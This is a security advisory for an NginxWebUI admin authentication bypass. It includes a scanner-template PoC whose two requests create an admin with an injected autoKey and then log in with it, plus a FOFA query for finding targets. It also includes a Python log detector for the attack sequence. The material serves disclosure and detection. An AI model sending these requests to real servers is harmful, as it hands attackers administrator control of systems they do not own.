nginxwebui-admin-bypass: NginxWebUI admin authentication bypass (all versions affected)

Date: 2025-09-01 | Affected software: NginxWebUI | PoC: public

Vulnerability description

Injecting an autoKey when creating an Admin-type user bypasses authentication: the attacker skips both the password and the Google Authenticator check and obtains administrator privileges. FOFA: app="nginxWebUI"

PoC code [public]

id: nginxwebui-admin-bypass

info:
  name: NginxWebUI admin认证绕过(全版本通杀)
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Admin类型注入autoKey绕过认证、绕过密码和Google认证获取管理员权限
    FOFA: app="nginxWebUI"
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzU0MzkzOTYzOQ==&mid=2247488355&idx=1&sn=f18e4e4e83a9c7a16f2a8f4042f03c5a
  tags: nginxwebui,bypass
  created: 2023/11/28

rules:
  r0:
    request:
      method: POST
      path: /adminPage/admin/addOver
      body: |
        id=&name=test&api=false&type=0&autoKey=111111&parentId=
    expression: response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"status":200')
  r1:
    request:
      method: POST
      path: /adminPage/login/autoLogin?autoKey=111111
    expression: response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"status":200') && response.body.bcontains(b'"obj"') && response.body.bcontains(b'"autoKey":"111111"')
expression: r0() && r1()
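As an added defensive example (not part of the original advisory or the afrog PoC above), the following Python scans nginx access log lines for the two-step sequence the PoC relies on: a successful POST to /adminPage/admin/addOver followed by a request to /adminPage/login/autoLogin carrying an autoKey from the same client. It assumes the default nginx "combined" log format in front of NginxWebUI; the sample log lines are constructed.

```python
import re

# Regex for the default nginx "combined" access log format
# (assumption: NginxWebUI is fronted by nginx logging in this format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

ADD_PATH = "/adminPage/admin/addOver"          # admin creation endpoint from the PoC
AUTOLOGIN_PATH = "/adminPage/login/autoLogin"  # autoKey login endpoint from the PoC


def detect_autokey_bypass(lines):
    """Return (client_ip, timestamp) for each autoLogin?autoKey=... request
    whose client previously got a 200 from addOver.

    A lone autoLogin is not flagged, because the autoKey feature has
    legitimate uses; the pairing with an unauthenticated admin creation is
    what matches the exploitation sequence in the PoC.
    """
    add_seen = set()   # clients that created an admin record successfully
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, path, status = m.group("ip", "ts", "method", "path", "status")
        url, _, query = path.partition("?")
        if url == ADD_PATH and method == "POST" and status == "200":
            add_seen.add(ip)
        elif url == AUTOLOGIN_PATH and "autoKey=" in query and ip in add_seen:
            alerts.append((ip, ts))
    return alerts


# Constructed sample log lines (not real traffic) exercising the rule.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Sep/2025:10:00:01 +0000] "POST /adminPage/admin/addOver HTTP/1.1" 200 61 "-" "curl/8.0"',
    '203.0.113.7 - - [01/Sep/2025:10:00:02 +0000] "POST /adminPage/login/autoLogin?autoKey=111111 HTTP/1.1" 200 210 "-" "curl/8.0"',
    '198.51.100.9 - - [01/Sep/2025:10:05:00 +0000] "GET /adminPage/login/autoLogin?autoKey=abc HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [01/Sep/2025:10:06:00 +0000] "POST /adminPage/admin/addOver HTTP/1.1" 403 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts in detect_autokey_bypass(SAMPLE_LOG):
        print(f"possible NginxWebUI autoKey bypass from {ip} at {ts}")
```

Only the first client is reported: the second hits autoLogin without a prior addOver, and the third's addOver was rejected with 403.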
